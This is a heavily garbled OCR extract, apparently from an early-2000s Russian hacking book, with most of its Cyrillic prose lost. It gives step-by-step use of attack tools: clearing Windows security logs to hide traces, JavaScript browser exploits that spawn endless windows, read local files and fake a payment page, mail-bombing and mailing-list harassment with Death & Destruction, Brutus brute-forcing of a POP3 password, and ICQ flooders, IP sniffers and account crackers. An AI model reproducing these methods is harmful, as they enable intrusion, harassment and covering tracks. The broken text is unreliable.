//ComputerName , /disable . auditpol.exe , , , , ( auditpol /?

).

Windows2000/XP :> (Start)

(Settings Control Panel).File Action View Help

Eve nt Viewer[Local]I T y p eIDescription ISire

Application ErrorR e c o r d 512...

Delete all recordsnthe log

Puc. 4 .7 . Windows

70

5/28/2018

73/189

(Control Panel) (Administrative Tools).

(Event Viewer). Event Viewer ( ) (. 4.7).

(Security Log);

. Clear all Events ( ).

, . 4.8, .

Doy ou wantlosa ve "Security"beforeclearing it?Yet No Cancel

Puc. 4.8. > (No), . .

, ! ,

. , elsave.exe ( h tt p :/ / w w w . i b t . k u . d k / j e s p e r / E L S a v e / d e f a u l t. h t m ) . , ,

Windo ws NT 4, W indows 2000. .

C:\els004>elsave s \\ComputerName s , . , . elsave /? , .

, elsave.exe . elsave.exe

W in dows ( (Start), AT MSDOS).

System, .71

5/28/2018

74/189

( , ).

, ,

. , , ,

, .

! 50%

( !)

,

,

[9].

, , Norton Personal Firewall, PGP Desktop Security .

,

,

, .

72

5/28/2018

75/189

5 # , , , ,

. , , , , , .

, 90 , . , , .

, , , .

, , , TCP/IP.

, .

, , . ,

.

, , ,

(, ).

, . , , , , Word .., , , , .

WWW (World Wide Web ), Web (). Web , Web . 1961 , Web 1992 .

, ,

5/28/2018

76/189

. Web

Web ,

, Web.

Web .

Web,

Web URL (UniformResource Locator ),

Web.

,

Web HTTP (Hyper Text Transfer

Protocol ).

, Web,

HTML (Hyper Text Markup Language

).

, ,

,

HTML CGI HTTP.

Web ,

,

Web, ,

,

,

1 Web

.

Web , ,

Web HTML Web,

( browser, ,

, ), Web Web.

HTML Web,

Web,

, , , ,

, , , , .

, HTML

, Web, , Inter

net Explorer(ff i) Netscape Navigator(NN).74

5/28/2018

77/189

Web

: Web , HTML Web , , ,

HTML, , Web? HTML?

. ( ) , , Web.

, DoS , Web . , , Web, , .

open ( ), JavaScript M a i nP a g e .h tm l

, HTML 8.1. 8.1. HTML Web

< SCRIPTLANGUAGE* avaScript >generation();function generation(){vard=0;while (true) {

a = new Date;

d =a.getMilliseconds( );window.open( MainPage. html ,d, width=250,height250 );

HTML, , . Windows2000/XP IE 5 IE 6 HTML, .

75

5/28/2018

78/189

IE 5 IE 6

.

tlep

. , 8.2

... (

).

8.2. HTML Web

var p=external....;

HTML 8.2 IE 5 6

var p 8.2.

( [3], [10])., ,

HTML .

[3] HTML,

CLSID. 8.3. HTML, .

8.3. HTML

8.3 IE 6 ,

. 5.1.

76

5/28/2018

79/189

WebJQC:\Documenl.andSelling*\Alex4M>DocuroenUSWorkD...[)11

. 5.1. HTML C:\Windows\system32\calc.exe,

, .

Web , JavaScript, HTML Web, . , IFRAME, Web .

8.4 HTML, , C:\security.txt. 8.4. Web_

C:\security.txt
alert(" :\n"bdocumentbody nnerText;

77

5/28/2018

80/189

II.navigate("file://:/Security.txt");setTimeout('Il.navigate(nfile://C:/Security.txt")',1000);

8.4 IE 5 IE 6

,

. 5.2.

. 5.2,

security.txt Web.

,

,

, JavaScript

.

Web

QMd0File Edit View Favorite* Tools Help C:\security.txt

. 5.2. Web

NavigateComplete2, [3]. Webcaumo& Web

, , ,

Web

. ,

Web ActiveX, .

,

,

, , ,

, ,

..

, ,

. ,

.

78

5/28/2018

81/189

Web

, Web, . , , .

, Web . , Win dows Web Microsoft

NetBus.

Web, . Web , . 8.7 HTML, .

8.7. HTML

Bubliki&Baranki

functionfalsify(){z=window.open("about:Internet Bubliki&Baranki "); do c ume nt . o p e n();z.document.write ("

5/28/2018

82/189

Bubliki&Baranki VirtualAir,

! , Bubliki&Baranki< / H T M L > 8.7 IE 5 ,

. 5.3.

h t t p : / / w w w . B u b l i k i & B a r a n k i . c o r n Rog&Kopito . Web Rog&Kopito

Bubliki&Baranki, Web Rog&Kopito .(, , .) ,

Web Bubliki&Baranki. Web, . 5.4.

Web . 5.4

.

VirtualAir

&;1 V u t u a l A i r , ! ,. Bublild&Baranki

. 5.3. Web Rog&Kopito

File Edit View Favorites Tools Help

Addre ssus) aboutlnternetMara3KHBubikilBaranki Go

VirtualAir

D VirtualAir

IDons | MyComputei

. 5.4. / VirtualAir Bubliki&Baranki

80

5/28/2018

83/189

Web

CGI GetCardNumber, Web, Rog&Kopito:

5/28/2018

84/189

, .

.

,

,

.

Web, , . :

. , ,

SSL.

Web

.

.

,

, ,

. .

,

. ,

, ,

,

. .

Web .

,

. ,

, ,

,

Web . , Web

, , , , .

, ,

4 IE Netscape, , 5 6

.

, , .

82

5/28/2018

85/189

6. , ,

, , , .

, . , , . , , , , , ... , !

(, , , 1, ). , , , , . ? .

( Flood ,) ( Spam , . Spam ). (.. ), , ,

. ,

5/28/2018

86/189

SMTP.

Death & Destruction

Email Bomber ( & ) 4.0,

Dn D ( h tt p : / / w w w . so f ts e e k . c o m / U t i li t ie s / V B R U N _ F i le s / ) .

, . , DnD, . Avalanche Avalanche

DnD, . .6.1 DnD 4.O.

Death andDesliuclion4.0File C l o ne s He ad e r Session Random L i s t s Mailing Lilts Window E x t r a s Help

Send bomb to:

Say bombisfrom: ICC:pj

|7|0 Randomly Change | EdilLMessageSubect:I

Message Body:

]0RandomyChange | Edit List|SMTPSpy

jendjombjl|EdilHeaders||Abort||Clear||Clone|fy

Email Bombing is rarely damagingtothetarget but is alwaysdamaging to smtphosts. I do NOTcondone mailbombing as itcauses problems for SysAdmins ofservers. I did not make thisprogram for people to blast awayateachother.PLEASE use itresponsibly, and if you HAVE toemail bomb, then please use theoption to randomly switch serversin betweenmessages;as itlightenstheloads on the server.Havefun anddon'truin a goodsysadmins time by flooding hisserver!

iSizeof BombIBRandomyChange[,Usagestosend:m I Edit Server listJI 1 I O Never ending bomb

20.01.2003. use the Edit He

Puc. 6.1. DnD DnD, , 11.

, ( ).

.

.

84

5/28/2018

87/189

DnD Settings(), DnD (. . 6.1).

Dn D Settings ()

:

> SMTP Host ( SMTP) , SMTP,

. SMTP Sword2000.sword.net.

> Spoof Host ( ) , . , .

Randomly Change (

) , SMTP.

> SMTP, Edit Server List (

Random S e r v e i Listorca.esdIH.w||mw.highway1.c| |intetconnect.ne| lhorizQns.netstjohns.edu ]Imalasada.lava. | lpressentef.com| |cyberhighway.n|mail.sisna.com||why.net |widQwmaker.co| Iclubmet.mettob|

wwa.comJ|nyx1G.cs.du.ed||clinet.fi j jcabletegina.co |soi.hypeichalcl rdagobert.rz.unijl lspace.net J |maple.nis.net|tka.com |Iplix.conr Idubmet.metrob|ltMvl.netihZOOO.nel |vitro,com

Puc. 6.2. SM TP

). RandomServer List ( ), . 6.2.

SMTP Random Server List ( ) . Submit().

Size of Bomb ( ) (. 6.1) :

# of messages to send ( ) . 10.

Never ending bomb ( ) .

85

5/28/2018

88/189

Checkthebox and then fill in theinformationthatwill appear in theheaders under that category; or uncheck the box toremove it fromthe headers.

XMailer: | XURL: |

XSender: |

XDate: |QReturn Path: [QReferences: | Priority: IQXAuthenlication Warning

| GenerateIP | |124.49.153.SO | [TedGilsdorf

Ok Clear Cancel

Puc. 6.5. MIME

13 , DnD

, .

, ,

.

, Clone ()

EMail bomb ( ) Bomber Spawn 1 (

), . 6.6.

aBomber Spawn1 Sendbombto:Say bomb is from:Message Subject:

Message Body:

SMTP Server:

1l 1 RandomlyChange

| | Random |gRandomly Change

yallnlm|I E d i t H e a d e r s|| Ab or t || Clear j[Status I

{MessagesSent |0 |

Puc. 6.6.

88

5/28/2018

89/189

, Bomber Spawn 1 ( ) EMailbomb ( )

SMTP.

,

SMTP.

, !

.

,

, (

).

> , Dn D Clones Load M u l t i Clones ( *

). Number of clones(), . 6.7

Number of clonesHow many clones do youwantto load?

L JPuc. 6.7.

!

> Number of clones ( ) ( 56) .

Bomber Spawn ( ), 1

.

Send Bomb ( ) .

& & ! ,

,

89

5/28/2018

90/189

! DnD , , Mailing lists ( ). Subscribe

joe lamer to mailing list( ), . 6.8, , Euro Queer ( ), Mormons (), Family Medicine

( ) !

*i S u b s c r i b e jo elamei to a mailing list! 1=1Subscribeyourenemyto a mailing list evenworsethen amailbombMorelistscoming nextversion..sorrylor the smallquantity(hislime.My apologies for the badusab ilitybut I will use checkboxes instead of option boxesnextversion..

Jewish List CMd Parenting Targetsemail address: [ Digital Queers GayQuakers Targetsfits name: |0hn Mormons Christianity Targets last name: | Gay/Lesbian womanism Lesbiansover 40 BiAustralians Euro Queer people FamilyMedecine Allergies

Puc. 6.8. DnD DnD . TargetEmail Address ( ), Subscribe em() . , .

, , DnD , , , . , Extras Pword generator ( * ). Randomic Password Generator ( ), . 6.9.

, How many characters? (?) ( 8 ) : Use Both ( )

, Use numbers ( ) 90

5/28/2018

91/189

*Randomic P a s s w o i d Geneialor Juslclick to generate arandompassword. Choose how longyou want it to beb ythenumberolcharacters.How many characters? [12 | Use Both Use numbers Use letters

6i2i9e1m5p8i

Close Clearbox

Useletters ( ) . , ,

.

Extras ()

69 SMTP ( SMTP Remote ( SMTP)), ( Raw Port ( )). , ( , SMTP). Other Tools( ) . , ,

.

, ; . , , . , ( ). , .

. , , (IMAP) , . .

Brutus Authentication Engine Test 2(Brutas , 2), Brutus AET2 ( h t t p : / / w w w . h o b i e . n e t / b r u t u s ) . . 6.10

Brutus, , FTP, HTTP, Telnet

NetBus.91

5/28/2018

92/189

1

IBiulusAE T2 www.hoobie.net/biutu: (January2000) (SisJElie Tools HelpTarget |127.0.0.1 | Ti"pe|POP3 |~| | Start | Stop [ C l e a r

Port (110 | Connections 10 Timeout}10 UseProxy|Drf||B?S..?.P.9.?.|DTrytostayconnectedfor [Unlimite||attempts

. . .0 Use Username SingleUsef Pass Mode[Word List"p|UserFile|users.txt ||Browse|passpje jwords.txt ||Browse|

Positive Authentication ResultsTarget I Type I Username I Password I

5J | ) R*c AuthSeq Throttle QuickKII II ll>dle

Puc.6.10. Brutus , Brutus ( 8 Brutus IIS). , alex1.sword.net, k o l ia . , ,

, .

.

Brutus 2 (. 6.10) Target () , alex1.sword.net.

> () , .

Connection Options ( ) Use Proxy ( ), .

> Authentication Options ( ) Single User( ) .

92

5/28/2018

93/189

User file ( ) , .. k o l ia .

> Pass Mode ( ) Brute Force( ). B rutus , .6.11.

X Bi utus 2 w w w . h o o b i e . n et / b iu l u i t (January 2 000JFile Tool. Help

Target |alex1.sword.net

nnectionO ptioru> o r l [110 | ConnectionsType| P OP 3 [T|| Start|Slop | Clear |

I 10 Timeout I 10 Use Proxy I DefineIPSOptions

| Modifysequence|T r y toslayconnectedfor|Untml8|r| attemptsAuthenticationOptions

0 UseUsemame 0Single UserUserlD | kolia

Pass Mode[BruteForce|1 |[Kange|||Dfellfcuted |

Positive AuthenticationResultsTarget I Type I Username|P a ssw or d |

Rtet AuthStq Throttle QuickKil

Puc. 6.11. Brutus POPS Range(). Range () Brutus BruteForce Generation (Brutus ),

.6.12.BiutusBiuleFoiceGeneration

Digits only

Lowercase Alpha

Uppercase Alpha

Mixed Alpha

Alphanumeric

FullKeyspace

MinLength[Max Length [4 [T

Cancel

Custom Range |etaoinsrhldcumfpgwybvkxjqzl234567890! |

Puc. 6.12.

93

5/28/2018

94/189

Brutus Brute Force Generation (Brutus ) , , . , , M in Length ( ) 3, Max Length( ) 4. , Digits only

( ). .

> Start () Brutus 2 Brutus 2. . 6.13.

X Uiutus 2 w w w . h o o b i e . n e t / b i u t u s [Januaiy2000JFile Took Help

1 = 1 Target|alex1.sword.net Type|POP3 EJ| Start | Stop | Clear|

iConnectionOption*Port [110 | ConnectionsI

10 Timeout 10

rPOl

I ?P3Options

| Modifysequence | D Trytostayconnectedfor|Unimte| >| attemptsAuthenticationOptions

El Use Username 0 Single UserUserlD [kolia

PassMode [Brute Force[ I Range DisllbAedPositive Authentication Results

Target I Type | Usernamealex1.sword.net POP3 kolia I Password I0007

Positive authentication atalex1 .sword.netwith User: kolia Password: 0007(10997attempts

10997 Uikolia P:0000Timeout Reject

~]|37Attemptsper second | Throttle Quick IdlePuc. 6.13. 1.

Positive Authentication Results ( ) , kolia 0007. , Brutus 10997 alex1.sword.net ( 11000). 5 Pentium 3 1000 , Ethernet 10 /.

,

, Brutus ( 94

5/28/2018

95/189

). , , , ( 8 ), , (, &$ ..). ! Brutus Brute Force Generation (Brutus ) 8 ,

Full Keyspace ( ). Start() Brutus 2 6 095 689 385 410 816 , !

12 ?

, , , (., , [10]). Brutus,

PassMode ( ). ( 100 000), , . , password, p a r o l , MyPassword Web

.

, , , Ethernet, 3050 / ( ). . , , , , .

. , , , , , . . , .

95

5/28/2018

96/189

IIS Brutus 8 , . , , . , , ,

, ! : . .

, , , . 1, , , , . , , , , . , ( ),

.

, , . . , TFTP 11 , 11 . , TFTP , . TFTP , ,

, . , , , , , .

. , ,

96

5/28/2018

97/189

( ) . , , , Web .. ( , ).

. , , ,

. . , .. , , , . , ..

, . , 2002 ., , , . Web. . . . .. ( ). Web, , ?, . , , ?, ?, ? . , , , , . , , , , ,

. , , , , repa_parenaia, !

. , ,

, ,

. 97

4 5830

5/28/2018

98/189

, , ,

, .

.

,

.

,

. , (

) ,

.

,

8 ( 12) , , .

,

Dn D. .

,

, Norton Antivirus

M a c A f e e VirusScan. ,

PGP Desktop Security.

,

.

, , , , .

, .

98

5/28/2018

99/189

7 .

ICQ ICQ Intelligent Call Query,

.

ICQ [] : I Seek You ; , ICQ . ICQ

,

1998 Mirabilis,

( 40 ) AOL.

ICQ ,

ICQ ,

, .

, , ICQ,

,

. , , .

ICQ ,

ICQ.

ICQ , ICQ, ,

http://www.ICQ.com, http://mirabilis.com. ICQ ICQ , ,1998,1999,2000,2002, ICQ 2003. ICQ

UDP, 4000,

TCP, .

, ICQ,

UIN(Unique Identification Number ). UTN ICQ ,

.

, ICQ?

ICQ ,

. , ? .

5/28/2018

100/189

, ICQ, . ,

ICQ ICQ .

, ICQ,: , UIN ,

, . , ICQ , ICQ . , , .

I C Q , , IP I C Q , , . ,

, DoS, 9 . , IP ICQ, , I CQ .

! , I C Q , . , , ,

, .

ICQ, Mirabilis . ICQ,

ICQ , .

, .

100

5/28/2018

101/189

ICQ

ICQ

. , ICQ

ICQ ICQ. , ICQ ;

, I C Q (, LameToy www.mirabilis.com). , ( ) , .

, , ,

, , . , ICQ.

. . Sword2000

IC Q Gro upwar e Serve r, A l e x ICQ Groupware Client, UESf, 1001, 11 , UIN, 1003. ICQ Groupware http://www.icq.com. ICQ, ICQGroupware, , , 1. , ICQ , ICQ . ICQ I CQ ,IC Q , I C Q .

101

5/28/2018

102/189

UIN ICQ UIN ICQ, , UIN . UIN . , , . , .

, , . ( ) LameToy for ICQ(DBKILLER), , , ( http://icq.cracks.ru/attack.shtml). LameToy for ICQ , , .

LameToy for ICQ. . 7.1 , LameToy for ICQ.

LameToy Fo r Ic q [ D B K I L L E R ] 1| Send [ Slop | | Update; | Menu | | Hide [f ExitLoseiL L M Z . JQ044JI P o t t Scarmei|

Selling [NormalMessageMUlNSniffer

1 I GetLocalIP11501[SendeimiNBIiOOlIPasswdL l|URL|hHp:/VMesssage

Puc . 7.1. LameToy for ICQ DBKILLER) ICQ

LameToy for ICQ (DBKILLER) Send (). , Setting() Loop () , . UIN, UIN# Ran (Random 102

5/28/2018

103/189

ICQ ). , , , , .

, ICQ, , UIN UIN. , ICQ (ICQ99a

ICQ99b) . DB( ) , DB Data Base , , DB NewDB. LameToy , DB killer ( DB) Setting (). ICQ,

.

, , LameToy, UIN , , , System Messenger ICQ Team ( h t t p : / / w w w . i c q i n f o . r u / s o f tj c q t e a m . s h t m l ) , ICQ Sucker .

lf~ac)pecaICQ DoS ( ) , . , , , Advanced ICQ IPSn iffe r ICQ Team ( Web, , http://www.icqinfo.ru/sofl_icqteam.shtml). . 7.2 Advanced ICQ IP Sn iffer.

Adv anced ICQ IP Sniffer aaa'Your UIN: [207685174|Password:IJUIN to check: |123456783 Clear list Saver

Cheek Timeout.Tiyagain.

ExtIP:|

Status: || IntIP: ||TCPFIa9: |

| TC PPott: |0| TCPVersion: |0

Puc. 7.2. IP ICQ

103

5/28/2018

104/189

IP ICQ UIN, Advanced ICQ IPSniffer ICQ, UIN . , , Your UIN( UIN) Password() Advanced ICQ IP Sniffer ( ICQ). Check () , ICQ

UTN , Info() . , Info () . 7.2 , ( ) IP ICQ, TCP, ICQ . , , Ext IP ( ), IntIP ( IP) TCP Port ( TCP). , ICQ ( ). ICQ, Advanced IP ICQ Sniffer,

ICQserver's address and port( ICQ), Server () .7.3.

ICQ server'saddress andport 3Address: licq.rnirdbilis.com

Port: [4000 || | OK|

| Cancel |

. 7 . . ICQ server's addressandport( ICQ) ICQserver's ad

dress and port ( ICQ) Mirab ilis ICQ 4000. , / IP / .

ICQ, , , I C Q , I C Q ICQ. , ,

. , ICQ, ICQMult iWar(http://www.paybackproductions.com/), ICQ Flooder(.7.4).

104

5/28/2018

105/189

I C Q

ICQ F l o o d e rFile

Victim'saddress: 127.0.0.1 | ICQ Port [1027El Randomly generated UINAppatenlsource UIN:QNo.ol Messages: |1 [Message:

E at this!

ICO Flooder 1.2 Copyright (C) 1998dphmanand Implant ManPuc. 7.4. ICQ

ICQ Flooder, .> V i c t im ' s address ( ) IP

ICQ.

> ICQport ( ICQ) TCP.> , UIN .

:

U T N Randomly generated UIN( UIN), UIN UIN.

UIN Apparent source UIN( UIN ) UIN, ICQ .

No. of Messages ( ) ICQ.

> Message () ( , ).

> Send! () .

, ICQ, ,

,, 105

5/28/2018

106/189

http://mht.hut.ru/icq/icq.html, ( , ,

ICQ , ).

ICQ ,

, , ! ICQ ICQ,

ICQ,

,

. ,

,

.

, , ICQ s u b M a c h in e G u nv1.4(http://icq.cracks.ru/best.shtml), . 7.5.

OICOSubMachineGunv l . 4by uDFile Settings About[Bruteforce]

[...[13Single[~~]Single

About

Agent

Force!

||(c)uD .Moscow 2 Q O 1Puc. 7.5. ICQ subMachineGun

U1N ICQ

106

5/28/2018

107/189

ICQ

bruteforce , ,

.

. ICQ ICQ subMachineGun .

> ICQ subMachineGun.> Settings * Connections&Cracking (

&). , . 7.6.

icq server port

[ Cracking]13Stop ifsuccessful... Make log of cracked uins0 Reconnect if timeout0 Cut passwds length to 8 digits

settimeout:relogln ; times

Cancel OKPuc. 7.6. U1N

icq server( ICQ) ICQ,

, I C Q L m i r a b i li s. s e r v e r . port ()

4000.

Cracking () :

Stop if successful ( ) ICQ.

Make log if cracked uins ( UIN) ICQ.

107

5/28/2018

108/189

Reconnect if timeout ( ) ICQ .

Cut password length to 8 digits ( 8 ) 8 .

> set timeout ( ) 15 .

> relogin ( ) ICQ 3.

ICQ s u b M a c h i n e G u n UIN . .

> ICQ subMachineGun Bruteforce( ) UIN. . Single

() UIN, .

Single() UIN.

UIN, (...) Making victims list ( ),

. 7.7.

Making victims list ( ) Range () , , UIN( 100000) ( 900900).

IHint:use Del to remove uins from listPuc. 7.7.

UIN

step () UIN ( 100). Generate() UIN; .

108

5/28/2018

109/189

ICQ

, Generate () UIN, , , .. Add () U IN .> UIN,

Open () UIN ( UIN ).

> UIN , t0*" . Clear () UIN ( ).

UIN, . .

> ICQ s u b M a c h i n e G u n Bruteforce ( ) . .

Single ()

, .

Single () .

, (...) Make passlist( ), . 7.8.

Make passlist ( )

.> Open ()

( ). , ICQ.

Use Del to remove passwords fromlistPuc. 7.8.

v Generato r ( ) Add (). , .

109

5/28/2018

110/189

> ,

0*"**]. Clear() ( ).

> , . .

Force (). , ICQsubMachineGunv1.4 (. 7.9).OICQ SubMachineGunv l 4 byu DFile Settings About

[Bruteforce][] 0 Single[~~] D Single

Abo ut

Agent

Puc. 7.9.

ICQ subMachineGunv1.4, UIN, ( , . 7.9 ). , , 15 , ICQ. 45 , ( ). ,

, , , , .. . ...110

5/28/2018

111/189

ICQ

( , , ICQ . ICQ , ICQ

. , ? ! , ? , ICQ , . , .

? , Windows. , . , ICQ , ICQ. I C Q , , ElcomSoft Advanced ICQ Password Recovery(http://www.elcomsoft.com).

, . . 7.10 Advanced ICQ PasswordRecovery.

31.01.20032:05ACQPR1.0launched,registeredversion

6.COPR1.0(cl2000PleaGoriunovandAndy Malvshev.ElcomSoflCo. LPuc. 7.10. ICQ .dat

ICQ, Advanced ICQ Password Recovery ( ICQ) .dat, ICQ.

111

5/28/2018

112/189

ICQ Password successfully found !

ICQ version:99b2000bUINpassword:

%CopytoClipboard fij ClosePuc. 7 .11 .

!

, , ICQ2002 2002. 2002 , UIN .dat,.., , 207685174.dat

(207685174 UIN ). ICQ Password successfully found! ( ICQ ), (.7.11). . 7.11, ICQ 99b 2000b, ICQ 2002 ( ).

, ICQ , , ICQ . , ,

(.[11]), Web (. 8). , , , .

, ICQ( ) , . , , , ICQ. , , ICQ , . , .

ICQ, . . , , I C Q

ICQ . , ICQ , UIN .

112

5/28/2018

113/189

ICQ

?

, , ,

,

. ,

, , , , , , ,

. ICQ , , ,

,

, ,

, ,

.

,.. ICQ, , ,

. ,

ICQ ICQ,

ICQ ( , ICQ Team

(http://www.lcqteam.com)). I C Q ICQ, ICQ ICQ.

, .

, ? ,

, . ,

,

? , ... , ,

, .

ICQ,

,

.

ICQ , .

ICQ ,

113

5/28/2018

114/189

ICQ. ICQ

DoS ... .

ICQ

. , ,

ICQ, ICQ, I C Q . ICQ,

ICQ. IP

, ,

ICQ.

ICQ .

, ICQ, UTN

. , ICQ, , , BlacklCE Defender, DoS.

, , .

,

. ,

ICQ

.

, ICQ, ICQ.

, IP ICQ,

. ,

.

, . ICQ

, PGP Desktop Security 2.9,

ICQ . ,

PGP ( [7]).

114

5/28/2018

115/189

8. Webcaumoft Web? , Web ,

. Web , Web . , , , .

, Web , , , , . HTML Web ( ), , . HTML . ( ).

, Web, ,Web, , . HTTP, , , . Web, , .

, Web, DoS , , Yahoo. , Web,

, ( ) Web , . Web , .

W e b~ caum a Web Web , , Web, Web,

5/28/2018

116/189

, .

Web Web, Web . Web ,

Web, Web . Web

, .

Web Web,, Internet Explorer (ffi), HTML Web, HTTP, Web.

Web , IIS Microsoft, Apache HTTP Server Apache Software Foundation

. Web, ASP (Active Server Page ) CGI, , Java SUN, Apache Software Foundation . Web, Web, , . SQL Microsoft, Oracle Oracle .

, , , ODBC (Open Data Base Connectivity

). , , , , , ...

?

1 Web~cauma , Web, . , .

116

5/28/2018

117/189

Web

Web , , , , , Web .

Web Web , , TCP 80, , Web,

( CVE, Web),

Web .

Web ASP, Java, CGI , .

Web , , , , ( ). , , .

, , (cookie), , .

Web

, , . , , C G I , CGI , , , .

,

Web , . , Web

, , , .

, , , Web, Web, .

, (, . [])., , ,

, IIS 5. , 117

5/28/2018

118/189

( HTTP), C G I ( ) Web

( Web). Web , . IIS , Web, .

, Web , , . , Web. . , FTP

, , .

, .

Web .

Web~cauma , Web, . , , , , .

, , . ,

Web , , , DNS, .

Web.

, .

118

5/28/2018

119/189

Web

c p Web

.

.

, ,

,

.

IP, , ,

. Whols . , HTML

Web . HTML

, Web,

, .

, ,

, , JavaScript .

, HTML Web

Web Teleport Pro., , Whols , ,

Web.

w h o i s( Unix), Web ,

whois Web.

W h o l s . , ,

. 1999

Network Solution (http://www.networksolution.com),

, , InterNic(http://www.internic.net).

/ . Web,

Whois ( ),

. Whois , ,

119

5/28/2018

120/189

, DNS. , RIPE NCC (Network Coordinate Center ), IP

. Web RIPE NCC (http://www.ripe.net), .8.1.

t@T1Aqp9c|fehltp://www.ripB.net/npen^^ub^^c^ El^|

. 8.1. Web RIPE NCC

IP Web

? DNS .

, SuperScan (http://www.foundstone.com), . 8.2.

SuperScan, .

> Start () .> Stop () .

> Scan type ( ) All list ports from( ).

> Start().

120

5/28/2018

121/189

Web

StarlfTMTStop|l.0.0.5

0 Ignore IP zero0 Ignore IP 255Extract from He

Timeout

P'ng|400|Conned

|2000 |Read

14000 I

Resolvehoslnames121 Onlyscan responsive pings[3 Showhost responses Ping only

Every portinlis All selected ports in list(5 All list p o e t s from A l l p o r t s f r om

5 E Z B

. 8.2.

SuperScan . , IP 1.0.0.1 HTTP I I S 5.0, Web. ( ), .

6 shares found on 1 remote hosts.wa 1 . 0 . 0 , 1MyDocumentsN E T L O G O ND

TeslMyDownloadsSYSVOL

M.0.0.1SMyDocumentsM.O.(mNETLOGONM.0.0.1\DM.0.0.1\Tesl.DownloadsM.0.0.1\SYSVOL

Map Drive

. 8.. I I S 5121

5/28/2018

122/189

Legion (http://packetstormsecurity.org/groups/rhinoS), 1.0.0.1 . 8.3., IIS 5, ,

? .

II5| I I S , HTTP (Hypertext Transfer Protocol

) CGI (Com mon Ga teway Interface ), I I S , .

HTTP , , [12], Web

. HTTP , GET. Web (, ), GET, , ,http://www.anyserver.com/documents/order.html. order.html /documents IIS,

c:\inetpub\wwwroot\documents.

CGI , , [12], . HTTP, :

http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2MyScript , /scripts IIS, a ?1+2 , MyScript. I I S , , , .

CGI, ASP(Active Server Pages ) ISAPI (Internet ServerProgramming Interface ). ASP :

http://www .anysite.com/scripts/MyScripts7napaMeTp1 =1& 2=2

122

5/28/2018

123/189

Web

MyScript.asp, , , HTML. ISAPI

, ISAPI.

HTTP:

http://www.anysite.com/isapi.111?1&2, IIS, , .

HTTP ,

II S . II S 2.0 :http://www.anysite.eom/.7.7.7.7.7winnt/secret.file Web , secret.txt.

Windows,

ACL.

IIS , Web

[3]. IIS

, ,

, , ,

SecurityLab.ru (http://www.securitylab.ru).

IIS, netcat (http://www.atstake.com), (netcat

[3] netc